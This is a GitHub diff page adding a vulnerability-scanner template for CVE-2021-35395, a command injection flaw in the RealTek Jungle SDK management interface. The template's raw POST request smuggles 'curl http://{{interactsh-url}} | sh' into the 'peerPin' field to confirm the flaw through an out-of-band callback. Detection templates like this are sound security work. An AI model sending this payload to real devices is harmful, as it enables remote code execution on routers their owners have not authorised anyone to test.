File tree Expand file tree Collapse file tree 1 file changed +25
-0
lines changed Expand file tree Collapse file tree 1 file changed +25
-0
lines changed Original file line number Diff line number Diff line change
1
+ id : CVE-2021-35395
2
+ info :
3
+ name : RealTek Jungle SDK - Arbitrary Command Injection
4
+ author : king-alexander
5
+ severity : critical
6
+ description : There is a command injection vulnerability on the "formWsc" page of the management interface.
7
+ reference :
8
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35395
9
+ - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
10
+ tags : cve,kev
11
+
12
+ http :
13
+ - raw :
14
+ - |
15
+ POST /goform/formWsc HTTP/1.1
16
+ Host: {{Hostname}}
17
+ Content-Type: application/x-www-form-urlencoded
18
+ # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
19
+ submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
20
+
21
+ matchers :
22
+ - type : word
23
+ part : interactsh_protocol
24
+ words :
25
+ - " http"
You can’t perform that action at this time.
0 commit comments